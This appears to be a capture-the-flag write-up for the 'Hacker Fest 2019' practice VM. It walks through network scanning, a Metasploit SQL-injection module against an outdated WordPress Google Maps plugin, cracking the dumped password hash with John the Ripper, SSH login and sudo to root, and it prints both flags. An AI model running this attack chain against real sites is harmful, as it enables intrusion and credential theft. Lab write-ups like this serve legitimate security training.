🎊Hacker Fest

The machine was part of a workshop for Hacker Fest 2019 at Prague. Difficulty level of this VM is very “very easy”.

1. Reconnaissance

• Scanning the network to find vulnerable machine's IP

arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:2a:1b:5b, IPv4: 192.168.10.11
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1	52:54:00:12:35:00	QEMU
192.168.10.2	52:54:00:12:35:00	QEMU
192.168.10.3	08:00:27:06:a6:81	PCS Systemtechnik GmbH
192.168.10.13	08:00:27:28:f0:0b	PCS Systemtechnik GmbH

• We find the IP of the vulnerable machine to be 192.168.10.13

2. Scanning

2.1 Nmap

• Using nmap to find the open ports and their services

nmap -p- -sV 192.168.10.13
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 21:20 IST
Nmap scan report for 192.168.10.13
Host is up (0.42s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
22/tcp    open  ssh      OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp    open  http     Apache httpd 2.4.25 ((Debian))
10000/tcp open  ssl/http MiniServ 1.890 (Webmin httpd)
MAC Address: 08:00:27:28:F0:0B (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

We find 4 open ports, tcp ports 21, 22, 80 and 10000 with ftp, ssh and two web servers running respectively

• Using Wappalyzer on the webpage running on port 80 we see that it uses WordPress CMS.

3. Initial Foothold

3.1 WPScan

• Using WPScan to find any vulnerable plugins

wpscan --url http://192.168.10.13
_______________________________________________________________

[i] Plugin(s) Identified:

[+] wp-google-maps
 | Location: http://192.168.10.13/wp-content/plugins/wp-google-maps/
 | Last Updated: 2022-03-03T08:07:00.000Z
 | [!] The version is out of date, the latest version is 8.1.21
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.10.02 (50% confidence)
 | Found By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.10.13/wp-content/plugins/wp-google-maps/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===============================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Mar 17 21:29:28 2022
[+] Requests Done: 173
[+] Cached Requests: 5
[+] Data Sent: 42.98 KB
[+] Data Received: 414.952 KB
[+] Memory used: 224.848 MB
[+] Elapsed time: 00:00:06

• We find that a wp-google-maps plugin is installed and might be vulnerable

3.2 Metasploit

• We find a module in metasploit for the plugging: auxiliary/admin/http/wp_google_maps_sqli

• Using the auxiliary module and setting RHOST to 192.168.10.13

[msf](Jobs:0 Agents:0) auxiliary(admin/http/wp_google_maps_sqli) >> show options

Module options (auxiliary/admin/http/wp_google_maps_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DB_PREFIX  wp_              yes       WordPress table prefix
   Proxies                     no        A proxy chain of format type:host:port[,type:host:p
                                         ort][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/m
                                         etasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host

[msf](Jobs:0 Agents:0) auxiliary(admin/http/wp_google_maps_sqli) >> set RHOSTS 192.168.10.13
RHOSTS => 192.168.10.13
[msf](Jobs:0 Agents:0) auxiliary(admin/http/wp_google_maps_sqli) >> run
[*] Running module against 192.168.10.13

[*] 192.168.10.13:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20220317213725_default_192.168.10.13_wp_google_maps.j_909026.bin
[+] 192.168.10.13:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 webmaster@none.local
[*] Auxiliary module execution completed

We get a username and a password hash: webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1

3.3 Cracking the hash

• To crack the hash, we save the hash into a file called passwd.txt

• We are using JohnTheRipper to crack to hash

john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
kittykat1        (?)
1g 0:00:00:01 DONE (2022-03-17 21:52) 0.5076g/s 5080p/s 5080c/s 5080C/s sandara..ilovewill
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed

We get the password kittykat1

• Using ssh we can login to the machine as webmaster

ssh webmaster@192.168.10.13
webmaster@HF2019-Linux:~$ whoami
webmaster

• flag.txt

webmaster@HF2019-Linux:~$ ls
flag.txt
webmaster@HF2019-Linux:~$ cat flag.txt
83cad236438ff0c0dbce55d7f0034aee18f5c39

4. Privilege Escalation

• Using sudo -l we find that webmaster can run ALL commands as root

webmaster@HF2019-Linux:~$ sudo -l
Matching Defaults entries for webmaster on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User webmaster may run the following commands on localhost:
    (ALL) ALL
webmaster@HF2019-Linux:~$ sudo su
root@HF2019-Linux:/home/webmaster whoami
root

• flag.txt

root@HF2019-Linux:/ cd /root
root@HF2019-Linux:~ ls
flag.txt
root@HF2019-Linux:~ cat flag.txt
3dcdf93d2976321d7a8c47a6bb2d48837d330624